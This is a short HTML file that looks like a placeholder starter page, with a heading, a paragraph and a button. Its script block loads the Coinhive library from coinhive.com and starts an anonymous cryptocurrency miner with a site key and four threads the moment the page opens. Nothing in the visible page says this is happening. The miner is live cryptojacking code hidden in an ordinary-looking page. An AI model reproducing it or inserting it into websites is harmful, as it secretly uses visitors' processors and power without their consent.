<!DOCTYPE html>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  // Configure CoinHive to point to your proxy
  
  //CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://localhost:8892"]];

  // Start miner
  var miner = new CoinHive.Anonymous('SyJbFykSEgBgSLDCe9xfMZkeWAj6hJLZ',
                                      { threads: 4 })
  miner.start();

  //miner.start();

</script>
<html>
<body>

<h1>My First Heading</h1>

<p>My first paragraph.</p>
<button>Click ME!</button>

</body>
</html>




